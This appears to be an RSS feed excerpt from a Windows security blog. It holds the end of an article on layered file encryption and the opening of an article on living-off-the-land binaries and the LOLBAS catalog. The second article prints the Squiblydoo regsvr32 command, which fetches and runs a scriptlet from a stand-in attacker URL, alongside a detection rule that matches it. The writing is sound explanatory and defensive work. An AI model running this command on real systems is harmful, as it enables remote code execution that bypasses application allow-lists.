&lt;th&gt;PDE adds&lt;/th&gt;
&lt;th&gt;Purview label adds&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Powered-off device at rest&lt;/td&gt;
&lt;td&gt;Protected&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Device on lock screen, post-boot pre-logon&lt;/td&gt;
&lt;td&gt;Plaintext to OS&lt;/td&gt;
&lt;td&gt;Plaintext (no logon)&lt;/td&gt;
&lt;td&gt;Encrypted, Hello-bound&lt;/td&gt;
&lt;td&gt;Encrypted, requires use license&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-user on the same device&lt;/td&gt;
&lt;td&gt;Plaintext to OS&lt;/td&gt;
&lt;td&gt;Per-user wrapping&lt;/td&gt;
&lt;td&gt;Per-Hello-user wrapping&lt;/td&gt;
&lt;td&gt;Per-policy wrapping&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File emailed outside the tenant&lt;/td&gt;
&lt;td&gt;Plaintext&lt;/td&gt;
&lt;td&gt;Decrypted on SMB / cross-FS copy&lt;/td&gt;
&lt;td&gt;Plaintext on cross-protocol egress&lt;/td&gt;
&lt;td&gt;Encrypted, travels with file&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The four layers map (loosely; this is not a regulatory opinion) to different regulatory expectations. BitLocker is the typical anchor for &quot;data at rest&quot; baselines in HIPAA, PCI DSS, and GDPR Article 32 (security of processing). Purview labels are where cross-organisation handling and Article 30 records-of-processing find a tractable enforcement story, because the policy travels with the data. PDE is the modern interpretation of &quot;user-bound access&quot; for shared devices and pre-logon scenarios. None of these regulatory frameworks names any specific layer; the practitioner&apos;s job is to map controls to expectations, not to ship a checklist of vendor features.
&lt;p&gt;{`
// Illustrative composition check. Given the per-layer status flags this device
// reports, identify which protection gaps remain. Run mentally over your device.&lt;/p&gt;
&lt;p&gt;function evaluateLayerCoverage(state) {
  const gaps = [];&lt;/p&gt;
&lt;p&gt;  if (!state.bitlockerEnabled) {
    gaps.push(&apos;BitLocker is OFF: volume is plaintext at rest&apos;);
  } else if (!state.bitlockerHasPIN) {
    gaps.push(&apos;BitLocker is on, but TPM-only: post-boot pre-logon window is open&apos;);
  }&lt;/p&gt;
&lt;p&gt;  if (!state.pdeEnabled) {
    gaps.push(&apos;PDE is OFF: per-user pre-logon and post-lock window not closed&apos;);
  } else if (!state.pdeKnownFoldersOn) {
    gaps.push(&apos;PDE enabled but no known-folder protection: user files not auto-encrypted&apos;);
  }&lt;/p&gt;
&lt;p&gt;  if (state.pdeEnabled &amp;amp;&amp;amp; state.efsLegacyFilesPresent) {
    gaps.push(&apos;Legacy EFS files coexist with PDE: mutually exclusive per file, migrate carefully&apos;);
  }&lt;/p&gt;
&lt;p&gt;  if (!state.purviewLabelsPublished) {
    gaps.push(&apos;No Purview labels published: no travels-with-file protection&apos;);
  }&lt;/p&gt;
&lt;p&gt;  if (state.dkeEverywhere) {
    gaps.push(&apos;DKE applied broadly: Microsoft 365 service-side processing will degrade&apos;);
  }&lt;/p&gt;
&lt;p&gt;  return gaps.length === 0
    ? &apos;Composition complete: all four layers configured with no obvious conflicts.&apos;
    : gaps;
}&lt;/p&gt;
&lt;p&gt;// Example: a modern Entra-joined Windows 11 24H2 Enterprise device with proper config.
const exampleDevice = {
  bitlockerEnabled: true,
  bitlockerHasPIN: true,
  pdeEnabled: true,
  pdeKnownFoldersOn: true,
  efsLegacyFilesPresent: false,
  purviewLabelsPublished: true,
  dkeEverywhere: false
};
console.log(evaluateLayerCoverage(exampleDevice));
`}&lt;/p&gt;

PowerShell (elevated) on the target device:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;manage-bde -status C:
cipher.exe /C &quot;C:\Users\alice\Documents\sample.txt&quot;
# CSP queries via the Settings &amp;gt; Accounts &amp;gt; Access work or school export, or via
# the Intune CSP report for the device, against the nodes listed above.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From an Exchange Online PowerShell session:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Connect-IPPSSession
Get-Label | Format-Table -AutoSize
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Composed correctly, those layers give you the threat coverage no single layer can. But the practitioner still has questions.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Five questions. Each addresses a misconception or operational concern the audit checklist exposes.&lt;/p&gt;

No. The two recovery models do not compose. BitLocker&apos;s recovery key unwraps the Volume Master Key against the TPM&apos;s seal; once the volume is unlocked, every plain NTFS file is readable again. PDE files sit *above* the volume layer, sealed by a DPAPI-NG protector bound to Windows Hello, not to the VMK. The PDE FAQ is explicit that PDE has no key-recovery model analogous to BitLocker&apos;s: *&quot;Personal Data Encryption doesn&apos;t have a requirement for a backup provider, including OneDrive in Microsoft 365. However, backups are recommended in case the keys used by Personal Data Encryption to protect files are lost&quot;* [@ms-pde-faq]. If the user&apos;s Hello credential is irrecoverably reset and there is no second-copy backup of the plaintext, BitLocker recovery does not help.

No -- not directly. EFS files are encrypted with a per-file symmetric File Encryption Key (FEK), which is RSA-wrapped to the user&apos;s EFS public key (and to one or more Data Recovery Agent public keys). The user&apos;s EFS RSA *private* key is stored in `%APPDATA%\Microsoft\Crypto\RSA\\` and is sealed by classic DPAPI from the user&apos;s logon secret [@wikipedia-efs]. So the password protects the *private key that unwraps the FEK*, not the file body. The Wikipedia EFS article puts the resulting ceiling sharply: any compromise of the user&apos;s password automatically leads to access to that data [@wikipedia-efs].

Partially. On Entra-joined Windows 11 22H2 or later devices with Windows Hello for Business, PDE is the recommended replacement for new per-file encryption scenarios, and Microsoft Learn states the mutual exclusion: PDE and EFS are mutually exclusive on the same file [@ms-pde-faq]. EFS continues to ship -- legacy `$EFS` files still decrypt, the Win32 API surface still works, Group Policy DRA configuration still functions [@ms-efs-win32]. PDE is the forward direction; EFS is the legacy slot. Plan for both during transition.

Labels are metadata. A *label that applies encryption* is metadata that triggers the Azure Rights Management service to encrypt the file with a per-content key and embed the wrapped key and policy reference in the file&apos;s wire format [@ms-purview-labels]. A label that applies only marking, watermarking, or DLP triggers is policy without encryption. The label itself is a classification; the encryption (if any) is a property attached to the label&apos;s settings.

Yes, with one caveat. The default modern composition for an Entra-joined Windows 11 24H2 Enterprise device is BitLocker (TPM+PIN) plus PDE (known-folder mode) plus a Purview sensitivity label that applies encryption [@ms-pde-faq] [@ms-purview-labels]. The caveat is the PDE / EFS mutual exclusion -- a given file is either PDE-wrapped or EFS-wrapped, not both [@ms-pde-faq]. So the rule is: BitLocker + (PDE OR EFS, mutually exclusive) + Purview label. That is the maximum legal composition.
&lt;p&gt;The answer the article opened with was the journey, not the destination. The destination is one sentence: three above-BitLocker layers, three protection-key roots, three threat models, by design. EFS exists because some files have to be unreadable to a different person sitting at the keyboard. PDE exists because some files have to be unreadable to the running OS itself, between boot and Hello sign-in. Purview labels exist because some files have to stay encrypted no matter which machine or protocol carries them next.&lt;/p&gt;
&lt;p&gt;When you next see a security document that asserts &quot;the data is protected because BitLocker is on,&quot; you now know exactly which threats that covers, and which it does not. The four roots compose. They do not compete. The asymmetry -- the very thing that makes the architecture look untidy from a distance -- is what lets each layer do what no other layer can.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;beyond-bitlocker-efs-pde-purview&quot; keyTerms={[
  { term: &quot;FEK&quot;, definition: &quot;File Encryption Key. The per-file symmetric key EFS uses to encrypt the file body; itself RSA-wrapped to each authorised principal.&quot; },
  { term: &quot;DRA&quot;, definition: &quot;Data Recovery Agent. A second principal whose public key is wrapped around the EFS FEK so the organisation can decrypt the file even if the user is unavailable.&quot; },
  { term: &quot;VMK&quot;, definition: &quot;Volume Master Key. The BitLocker key-encrypting key wrapping the Full Volume Encryption Key; sealed in the TPM against PCRs.&quot; },
  { term: &quot;CEK&quot;, definition: &quot;Content Encryption Key. The per-content symmetric key used by Azure Rights Management to encrypt a Purview-labelled document; embedded in the document, wrapped by the tenant root key.&quot; },
  { term: &quot;Use license&quot;, definition: &quot;A short-lived authorization artifact issued by Azure RMS to a specific authenticated user, granting decryption and policy-defined rights for a particular protected document.&quot; },
  { term: &quot;Protection descriptor&quot;, definition: &quot;The DPAPI-NG rule string that names the principal whose authentication will be required to unwrap a protected blob; supports SID, SDDL, LOCAL, WEBCREDENTIALS, and CERTIFICATE principal types.&quot; },
  { term: &quot;DKE&quot;, definition: &quot;Double Key Encryption. A two-key model in which Purview-protected content requires both an Azure-held key and a customer-on-premises-held key to decrypt; blinds Microsoft 365 service-side processing.&quot; },
  { term: &quot;classic DPAPI&quot;, definition: &quot;The original Windows Data Protection API; per-user wrapping derived from the user&apos;s logon secret. EFS depends on classic DPAPI to seal the user&apos;s EFS RSA private key.&quot; },
  { term: &quot;DPAPI-NG&quot;, definition: &quot;The Windows 8+ Data Protection API extension that supports cross-machine and identity-aware protectors via protection descriptors; PDE is built on this surface.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>bitlocker</category><category>encryption</category><category>personal-data-encryption</category><category>microsoft-purview</category><category>encrypting-file-system</category><category>dpapi</category><category>sensitivity-labels</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Living Off the Land on Windows: The LOLBin Catalog and the Structural Ceiling Microsoft Cannot Break</title><link>https://paragmali.com/blog/living-off-the-land-on-windows-the-lolbin-catalog-and-the-st/</link><guid isPermaLink="true">https://paragmali.com/blog/living-off-the-land-on-windows-the-lolbin-catalog-and-the-st/</guid><description>How a 1996 Authenticode design choice produced the LOLBin class, why the LOLBAS catalog has 207 binaries and Microsoft only blocks ~40, and why that gap is permanent.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Living-off-the-land binaries (LOLBins) are Microsoft-signed Windows executables that attackers coerce into doing useful work** -- run scripts, fetch payloads, sidestep allow-lists. The community LOLBAS catalog lists 207 of them as of May 2026. Microsoft&apos;s App Control Recommended Block Rules deny about 40. The 167-binary gap is not a backlog. It is the structural ceiling: Windows administration *requires* powerful, signed, trusted utilities. This article traces the class from a 1996 Authenticode trade-off through Casey Smith&apos;s 2016 Squiblydoo, the 2018 founding of LOLBAS, and Microsoft&apos;s four-generation response, and argues the class is permanent.
&lt;h2&gt;1. The Four-Line Bypass That Cannot Be Patched&lt;/h2&gt;
&lt;p&gt;On April 19, 2016 [@attack-t1218-010], a researcher named Casey Smith published a four-line command on a personal Blogspot site. The command coerced a Microsoft-signed system binary into fetching and executing arbitrary JScript from an attacker-controlled URL, in memory, with nothing written to disk, on a Windows endpoint with AppLocker in &lt;em&gt;enforce&lt;/em&gt; mode [@lolbas-regsvr32]. Ten years and three Microsoft defensive generations later, you can paste the same four lines into a default-configured Windows 11 box and watch it succeed. This article explains why.&lt;/p&gt;
&lt;p&gt;The command is short enough to memorize:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;regsvr32 /s /n /u /i:http\u003a//attacker/x.sct scrobj.dll
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Every part of it is normal. &lt;code&gt;regsvr32.exe&lt;/code&gt; is the operating system&apos;s COM registration utility, shipped in every Windows release since NT 4. The &lt;code&gt;/i:URL&lt;/code&gt; switch is documented [@lolbas-regsvr32]: it passes an &lt;em&gt;installation parameter&lt;/em&gt; to a COM scriptlet. &lt;code&gt;scrobj.dll&lt;/code&gt; is the Microsoft Script Component runtime. The &lt;code&gt;.sct&lt;/code&gt; extension is the documented Microsoft Script Component file format. Smith was not exploiting a buffer overflow or a logic flaw. He was using the binary the way Microsoft designed it.&lt;/p&gt;
&lt;p&gt;What is not normal is who controls the URL. When &lt;code&gt;regsvr32.exe&lt;/code&gt; fetches that &lt;code&gt;.sct&lt;/code&gt; over HTTP and hands it to &lt;code&gt;scrobj.dll&lt;/code&gt;, the scriptlet&apos;s body runs inside a Microsoft-signed parent process. The &lt;code&gt;/s&lt;/code&gt; flag suppresses dialog boxes, &lt;code&gt;/n&lt;/code&gt; tells &lt;code&gt;regsvr32&lt;/code&gt; not to call &lt;code&gt;DllRegisterServer&lt;/code&gt;, and &lt;code&gt;/u&lt;/code&gt; reverses the operation -- so no registry change persists. The result: arbitrary JScript or VBScript running as the logged-on user, parented to a binary the default AppLocker policy admits by publisher, with no file on disk and no registry breadcrumb. Smith published the technique on April 19, 2016; Carbon Black named it &lt;em&gt;Squiblydoo&lt;/em&gt; in its April 28, 2016 threat advisory, and the MITRE ATT&amp;amp;CK page for the technique attributes the name to that advisory [@attack-t1218-010]. The trade press picked the name up within days: by April 29 The Register was running a headline about &quot;hipster hackers&quot; and routing readers to the Carbon Black writeup for the naming origin [@reg-squiblydoo].&lt;/p&gt;

The specific technique of abusing `regsvr32.exe` with the `/i:URL` switch to fetch and execute a remote COM scriptlet (`.sct` file) containing attacker-controlled JScript or VBScript. Disclosed by Casey Smith on April 19, 2016; named *Squiblydoo* by Carbon Black&apos;s April 28, 2016 threat advisory; tracked by MITRE ATT&amp;amp;CK as sub-technique T1218.010 [@attack-t1218-010].

sequenceDiagram
    participant User as User shell
    participant Regsvr32 as regsvr32.exe (signed)
    participant Scrobj as scrobj.dll (signed)
    participant Remote as Attacker HTTP server
    participant JScript as JScript engine
    User-&amp;gt;&amp;gt;Regsvr32: regsvr32 /s /n /u /i:URL scrobj.dll
    Regsvr32-&amp;gt;&amp;gt;Scrobj: Load COM scriptlet runtime
    Scrobj-&amp;gt;&amp;gt;Remote: GET /x.sct
    Remote--&amp;gt;&amp;gt;Scrobj: scriptlet XML with embedded JScript body
    Scrobj-&amp;gt;&amp;gt;JScript: Evaluate script body in-process
    JScript--&amp;gt;&amp;gt;User: Arbitrary code runs as the user
&lt;p&gt;The reason this bypass is famous is not the technique. It is the &lt;em&gt;invariance&lt;/em&gt;. Microsoft has shipped App Control for Business, the Recommended Block Rules deny list, Smart App Control, AMSI, the Windows Resiliency Initiative, and the Microsoft Vulnerable Driver Blocklist in the intervening decade [@ms-bypass-rules] [@ms-sac-overview] [@ms-driver-blocklist] [@ms-wri-nov2024]. None of those controls is enabled by default on a freshly installed Windows 11 Home or Pro endpoint, and none of them blocks Squiblydoo without administrator action. Casey Smith&apos;s command is the security industry&apos;s longest-lived working proof-of-concept against the &lt;em&gt;defaults&lt;/em&gt; of a flagship operating system.&lt;/p&gt;
&lt;p&gt;A defender watching this from an EDR console sees a specific shape: a parent process (often &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;explorer.exe&lt;/code&gt;, an Office app, or a script host) spawns &lt;code&gt;regsvr32.exe&lt;/code&gt;, and the command line contains &lt;code&gt;/i:http&lt;/code&gt;. That parent-child pattern plus a URL in the argument list is the entire detection surface. Most defenders write it as a &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Sysmon Event ID 1&lt;/a&gt; (process create) rule.&lt;/p&gt;
&lt;p&gt;{`
// Simulated EDR rule: flag any child regsvr32.exe whose command line
// references a remote URL. This is the canonical detection shape that
// SOC analysts have been writing for ten years.
function isSquiblydoo(event) {
  const child = (event.image || &apos;&apos;).toLowerCase();
  const cmd   = (event.commandLine || &apos;&apos;).toLowerCase();
  if (!child.endsWith(&apos;\\regsvr32.exe&apos;)) return false;
  // /i:http or /i:https with a URL argument is the load-bearing signal.
  return /\/i:https?:\/\//.test(cmd);
}&lt;/p&gt;
&lt;p&gt;const sample = {
  image: &apos;C:\\Windows\\System32\\regsvr32.exe&apos;,
  parentImage: &apos;C:\\Windows\\System32\\cmd.exe&apos;,
  commandLine: &apos;regsvr32 /s /n /u /i:http\u003a//attacker.example/x.sct scrobj.dll&apos;
};
console.log(&apos;Squiblydoo match:&apos;, isSquiblydoo(sample));
`}&lt;/p&gt;
&lt;p&gt;The detection works. It is also, by 2026, a checked box in every commercial EDR. The persistence of the bypass therefore raises two questions the rest of this article must answer. First: how can a ten-year-old, publicly-named, vendor-acknowledged technique still work on the default configuration of the world&apos;s most-deployed desktop operating system? Second: is &lt;code&gt;regsvr32&lt;/code&gt; an exotic one-off, or is Squiblydoo the visible tip of a structural class that runs the length of the Windows binary catalog? The honest answers sit at opposite ends of an architectural argument, and the road between them runs through a community catalog with 207 entries.&lt;/p&gt;
&lt;h2&gt;2. Five Years From Coined Phrase to Catalog&lt;/h2&gt;
&lt;p&gt;When did &lt;em&gt;living off the land&lt;/em&gt; become a phrase defenders said out loud? The answer is a specific evening in Louisville, Kentucky. On September 27, 2013, at DerbyCon 3 (&quot;All in the Family&quot;), Christopher Campbell and Matt Graeber gave a talk titled &lt;em&gt;Living off the Land: A Minimalist&apos;s Guide to Windows Post-Exploitation&lt;/em&gt; [@derbycon3-lol]. Their argument: an attacker on a Windows host could persist, escalate, pivot, and exfiltrate without dropping a single binary -- using only pre-installed signed Microsoft tools (&lt;code&gt;wmic&lt;/code&gt;, &lt;code&gt;netsh&lt;/code&gt;, &lt;code&gt;powershell&lt;/code&gt;, scheduled tasks). Antivirus and host-intrusion-prevention products in 2013 were optimized to catch unsigned, third-party code. Campbell and Graeber pointed out that the entire offensive toolkit could be assembled out of vendor-supplied parts.&lt;/p&gt;
&lt;p&gt;The phrase entered defender vocabulary, but the &lt;em&gt;catalog&lt;/em&gt; did not exist yet. What happened between 2013 and 2018 was a slow accumulation of disclosures -- each one a Microsoft-signed binary, each one with a documented feature an attacker could repurpose [@enigma0x3-dnx] [@enigma0x3-rcsi] [@lolbas-msbuild] [@lolbas-installutil]. Casey Smith&apos;s April 2016 Squiblydoo [@attack-t1218-010] was followed by his MSBuild inline-task bypass [@lolbas-msbuild], his InstallUtil &lt;code&gt;/U&lt;/code&gt; bypass [@lolbas-installutil], and a series of related developer-utility disclosures. Matt Nelson added &lt;code&gt;dnx.exe&lt;/code&gt; on November 17, 2016 [@enigma0x3-dnx] and &lt;code&gt;rcsi.exe&lt;/code&gt; four days later [@enigma0x3-rcsi]. By the end of 2016 a generic pattern was visible: any Microsoft-signed binary that could compile, interpret, deserialize, or fetch arbitrary content was a candidate.&lt;/p&gt;
&lt;p&gt;In 2017-2018 the framing crystallized. Matt Graeber and Casey Smith spoke at BlueHat IL 2017; the conference materials sit in a community mirror that catalogs the session as a Graeber + Smith Windows trust talk [@bluehat-il-mirror]. The canonical &lt;em&gt;Subverting Trust in Windows&lt;/em&gt; writeup came a year later, from Matt Graeber and Lee Christensen (SpecterOps), at TROOPERS 2018 -- it named &lt;em&gt;misplaced trust&lt;/em&gt; as the mismatch between &lt;em&gt;the binary is signed by Microsoft&lt;/em&gt; and &lt;em&gt;the binary&apos;s behavior is trustworthy when handed attacker-controlled arguments&lt;/em&gt; [@specterops-subverting-trust]. The same year, Symantec&apos;s ISTR special report brought &quot;living off the land&quot; into the CISO vocabulary at scale [@symantec-istr-lotl]. The technique class was understood; what was missing was a name and a list.&lt;/p&gt;
&lt;p&gt;The naming happened in 2018, on Twitter, in a six-week burst that the LOLBAS README still preserves as the project&apos;s origin story [@lolbas-github]. On March 1, 2018 (UTC; the LOLBAS README dates this to February 28 in the poster&apos;s local timezone), Philip Goh proposed the acronym &lt;em&gt;LOLBins&lt;/em&gt; -- Living-Off-the-Land Binaries. On April 13, 2018 (UTC; the LOLBAS README dates this to April 14 in the poster&apos;s local timezone), Jimmy Bayne proposed &lt;em&gt;LOLScripts&lt;/em&gt; for the script-host equivalent (no poll was taken). On April 15, Oddvar Moe ran a ratification poll asking the community to choose between &lt;em&gt;LOLBin&lt;/em&gt; and &lt;em&gt;LOLBas&lt;/em&gt;; LOLBin won with 69 percent of the vote. Three days later, on April 18, 2018 at &lt;code&gt;10:04:50 UTC&lt;/code&gt;, Moe created the GitHub repository &lt;code&gt;api0cradle/LOLBAS&lt;/code&gt; [@lolbas-api0cradle]. On June 8 the project moved to its organization-owned successor &lt;code&gt;LOLBAS-Project/LOLBAS&lt;/code&gt; [@lolbas-org-api]. The catalog was live, versioned, and pull-request-driven.&lt;/p&gt;
&lt;p&gt;The Goh proposal, the Bayne proposal, and the Moe poll were all on what is now X. The original tweets sit behind a login wall today, but the LOLBAS README preserves the full chain of attribution and links the exact tweet IDs. Decoding the linked Twitter snowflakes yields UTC timestamps for the Goh and Bayne tweets that land one day after the LOLBAS-attributed local-time dates (March 1 and April 13 UTC, respectively); the article&apos;s prose uses the UTC dates because they are the only timestamps that are independently verifiable from the snowflake.&lt;/p&gt;
&lt;p&gt;Two more 2018 events matter. On August 17, 2018, Matt Graeber posted &lt;em&gt;Arbitrary Unsigned Code Execution Vector in Microsoft.Workflow.Compiler.exe&lt;/em&gt;; the article appeared first on Medium and was republished on SpecterOps, and the LOLBAS Microsoft.Workflow.Compiler entry preserves the disclosure chain via the linked tweet and the SpecterOps URL in its Resources field [@lolbas-mwc]. The technique showed that a binary nobody had heard of -- the .NET Workflow Foundation rules compiler -- could compile and execute arbitrary unsigned C# given a crafted XOML file. The disclosure was important not for its novelty but for its obscurity: if &lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt; was a LOLBin and nobody knew, how many other unscanned-for binaries shipped with the same primitive? The question would drive the catalog&apos;s growth over the next eight years.&lt;/p&gt;
&lt;p&gt;The other event was the foundational talk. At DerbyCon 8 in Louisville, Kentucky, in October 2018, Oddvar Moe gave a presentation titled &lt;em&gt;#LOLBins -- Nothing to LOL about!&lt;/em&gt; [@derbycon8-moe]. The LOLBAS README itself names this as the project&apos;s foundational talk [@youtube-moe-lolbins] [@lolbas-github], not the BlueHat IL 2019 session that some later secondary sources cite. By the project&apos;s own retrospective, the talk introduced the catalog to a wider audience and aligned the community around the inclusion criteria and YAML schema that govern the project today.&lt;/p&gt;

timeline
    title LOLBin coinage and catalog, 2013 to 2018
    2013-09-27 : DerbyCon 3 Campbell and Graeber coin &quot;living off the land&quot;
    2016-04-19 : Casey Smith publishes Squiblydoo (regsvr32 + COM scriptlet)
    2016-11    : Matt Nelson publishes dnx and rcsi bypasses
    2017       : Graeber and Smith speak at BlueHat IL 2017
    2018-03-01 : Philip Goh proposes &quot;LOLBins&quot; on Twitter (UTC)
    2018-03    : Graeber and Christensen present Subverting Trust in Windows at TROOPERS
    2018-04-13 : Jimmy Bayne proposes &quot;LOLScripts&quot; (UTC)
    2018-04-15 : Oddvar Moe poll ratifies &quot;LOLBin&quot; with 69 percent
    2018-04-18 : api0cradle/LOLBAS GitHub repo created
    2018-06-08 : LOLBAS-Project organization repo created
    2018-08-17 : Matt Graeber discloses Microsoft.Workflow.Compiler.exe
    2018-10    : Oddvar Moe DerbyCon 8 &quot;#LOLBins -- Nothing to LOL about!&quot;

A Living-Off-the-Land Binary: a Microsoft-signed Windows executable, either native to the operating system or downloaded from Microsoft, that has &quot;extra unexpected functionality&quot; useful to an attacker or red team -- typically the ability to execute, download, encode, decode, compile, or otherwise weaponize attacker-controlled content. The term was ratified by community poll in April 2018; the canonical catalog is the LOLBAS project [@lolbas-github].
&lt;p&gt;Five years from coined phrase to versioned, community-edited catalog. What took five years was not the technique -- the technique was already there in 2013, and Casey Smith had publicly demonstrated three flavors of it by the end of 2016. What took five years was &lt;em&gt;naming the class&lt;/em&gt;. The naming mattered because it turned a stream of one-off disclosures into a defensible artifact: a list a SOC could subscribe to, a schema a detection engineer could parse, and -- as the next section argues -- a body of evidence for an architectural claim about Windows that nobody had yet been willing to articulate out loud. Why does the technique class exist? The answer is a 1996 design decision.&lt;/p&gt;
&lt;h2&gt;3. The Two Trust Axes Microsoft Decoupled in 1996&lt;/h2&gt;
&lt;p&gt;Why does the default AppLocker policy admit every Microsoft-signed binary on the disk? Because Microsoft made a deliberate trade-off in 2009, and that trade-off inherits an even deeper trade-off from 1996.&lt;/p&gt;
&lt;p&gt;Start with the 1996 trade-off. &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;&lt;em&gt;Authenticode&lt;/em&gt;&lt;/a&gt; shipped with Internet Explorer 3.0 to answer one question: &lt;em&gt;was this code signed by a party I trust?&lt;/em&gt; [@ms-crypto-tools] [@ms-authenticode-1996]. The mechanism is short to describe. A publisher (Microsoft, Adobe, the local IT shop) signs an executable&apos;s hash with a private key whose certificate chains to a root the operating system trusts. The signature travels with the file. At load time, Windows recomputes the hash, validates the signature, walks the certificate chain, and reports the verified publisher to whichever caller asked. That is the whole protocol.&lt;/p&gt;

Microsoft&apos;s code-signing scheme, shipped with Internet Explorer 3.0 in 1996 [@ms-authenticode-1996]. Authenticode binds a publisher identity to a binary&apos;s hash via an X.509 certificate chain. Validation answers *who signed this file and was it modified after signing?* It does not -- and cannot -- describe what the file does when executed [@ms-crypto-tools].
&lt;p&gt;Notice what Authenticode does &lt;em&gt;not&lt;/em&gt; answer. It says nothing about what the binary does at runtime. It does not describe which APIs the binary calls, what arguments those calls accept, whether the binary loads external content, or whether the binary&apos;s documented behavior includes &quot;execute attacker-controlled JScript fetched over HTTP.&quot; Authenticode signs; it does not characterize. That distinction is not a defect in the design -- it is the design. A signature scheme that tried to formally describe runtime behavior would need a semantic model of every signed program, which is the kind of problem theoretical computer science has spent fifty years calling undecidable.&lt;/p&gt;
&lt;p&gt;Thirteen years later, in October 2009, AppLocker shipped with Windows 7 [@ms-applocker-overview]. AppLocker introduces &lt;em&gt;publisher rules&lt;/em&gt;, &lt;em&gt;path rules&lt;/em&gt;, and &lt;em&gt;hash rules&lt;/em&gt; as the first-class Windows application-allow-list primitive. The interesting one is the publisher rule. AppLocker&apos;s default rule template admits every executable under &lt;code&gt;%windir%&lt;/code&gt; or &lt;code&gt;%programfiles%&lt;/code&gt; via three path-based rules (one each for executables, scripts, and Windows Installer files) [@ms-applocker-default-rules] -- which is where Microsoft&apos;s tens of thousands of signed binaries live -- and the canonical managed deployment adds a publisher rule that explicitly trusts the Microsoft signer chain [@ms-applocker-overview]. Either way, the practical effect is the same: every Microsoft-signed binary on a default Windows install inherits broad trust.&lt;/p&gt;

The Windows 7 application-allow-list feature (shipped October 22, 2009) that admits or denies binary execution based on publisher signature, file path, or file hash rules. The default rules are path-based and admit every executable under `%windir%` or `%programfiles%` [@ms-applocker-default-rules]; canonical managed deployments add a publisher rule that trusts the Microsoft signer chain. Microsoft&apos;s own documentation now describes AppLocker as &quot;a defense-in-depth security feature and not considered a defensible Windows security feature&quot; [@ms-applocker-overview]; App Control for Business is the modern successor.
&lt;p&gt;Why the default rule? Because the alternative -- a hash-by-hash allow list of every Microsoft-signed file -- breaks the day Patch Tuesday ships a new build of &lt;code&gt;mshtml.dll&lt;/code&gt; or &lt;code&gt;cmd.exe&lt;/code&gt;. A hash allow list at the scale of Windows is not maintainable. A path allow list is bypassed by file copy. The publisher rule is the only choice that makes the system deployable in a large enterprise without an army of administrators rebuilding policy XML every month. AppLocker&apos;s default rule was, by any pragmatic measure, the right call.&lt;/p&gt;
&lt;p&gt;But that call inherits Authenticode&apos;s blindness. AppLocker decides whether a signed binary may run; Authenticode decides whether the signature is valid. Neither layer knows what the binary &lt;em&gt;does&lt;/em&gt;. The two systems live on orthogonal trust axes:&lt;/p&gt;

flowchart LR
    A[&quot;Authenticode signing&lt;br /&gt;Who signed this binary?&quot;] --&amp;gt; B[&quot;AppLocker policy&lt;br /&gt;Is this publisher allowed?&quot;]
    B --&amp;gt; C[&quot;Binary loads and runs&quot;]
    C --&amp;gt; D[&quot;Runtime behavior&lt;br /&gt;What does this binary do with arguments?&quot;]
    D -. unmeasured .-&amp;gt; E[&quot;Attacker-controlled script,&lt;br /&gt;DLL, XOML, or URL is executed&quot;]
    style D stroke:#888,stroke-dasharray: 5 5
    style E stroke:#c33,stroke-width:2px
&lt;p&gt;The point of the diagram is the dotted edge. There is no measurement of &lt;em&gt;D&lt;/em&gt; before &lt;em&gt;C&lt;/em&gt;. The control plane stops at the signature check, and the runtime behavior is the attacker&apos;s playground. That gap is exactly where Squiblydoo lives. &lt;code&gt;regsvr32.exe&lt;/code&gt; is Microsoft-signed (Authenticode says &lt;em&gt;yes&lt;/em&gt;). It is on the default AppLocker publisher rule (AppLocker says &lt;em&gt;yes&lt;/em&gt;). It has a documented &lt;code&gt;/i:URL&lt;/code&gt; switch that loads remote scriptlets (no layer measures this). The attacker supplies the URL.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Signature trust answers &lt;em&gt;who signed this?&lt;/em&gt;. It cannot answer &lt;em&gt;what does this binary do at runtime?&lt;/em&gt;. The LOLBin class is the runtime consequence of treating those as the same question.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the structural error -- and &quot;error&quot; is the wrong word, because it was a deliberate, documented trade-off both times. Authenticode in 1996 chose publisher identity over behavioral semantics because behavioral semantics is undecidable. AppLocker in 2009 chose publisher rules over hash rules because hash rules do not survive Patch Tuesday. Both choices were correct on their own terms. The LOLBin class is what happens when you compose two locally-correct choices and discover that the composition has a property neither original choice predicted.&lt;/p&gt;
&lt;p&gt;Microsoft itself acknowledges the limit in writing. The current Microsoft Learn AppLocker overview contains the verbatim admission: &lt;em&gt;AppLocker is a defense-in-depth security feature and not considered a defensible Windows security feature&lt;/em&gt; [@ms-applocker-overview]. The same documentation names App Control for Business as the modern successor and routes new deployments there.&lt;/p&gt;

